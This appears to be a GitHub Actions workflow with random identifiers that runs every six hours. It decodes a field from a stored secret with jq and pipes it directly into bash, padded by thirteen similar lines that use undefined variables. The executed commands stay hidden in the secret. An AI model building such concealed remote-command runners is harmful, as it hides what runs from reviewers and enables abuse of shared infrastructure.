name: fengyuanchai4545

on:
  workflow_dispatch:
  schedule:
    - cron: '10 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fengyuanchai4545
        env:
          vk96: ${{ secrets.vk96 }}
        run: |
          echo $vk96 | jq -r .d5 | /bin/bash
          echo $bx80 | jq -r .f35224 | /bin/bash
          echo $yq670 | jq -r .efd36 | /bin/bash
          echo $r332 | jq -r .gnbjo613 | /bin/bash
          echo $teya12419 | jq -r .adro494 | /bin/bash
          echo $y33 | jq -r .f60 | /bin/bash
          echo $laoe669 | jq -r .u051 | /bin/bash
          echo $pxq31 | jq -r .jeyvb894 | /bin/bash
          echo $hd786 | jq -r .lrzl4 | /bin/bash
          echo $im9 | jq -r .acbl47615 | /bin/bash
          echo $lkx43 | jq -r .krc8 | /bin/bash
          echo $dhjgj9122 | jq -r .ihfp87 | /bin/bash
          echo $x5182 | jq -r .bohcz80 | /bin/bash
          echo $uzyo82 | jq -r .b73849 | /bin/bash

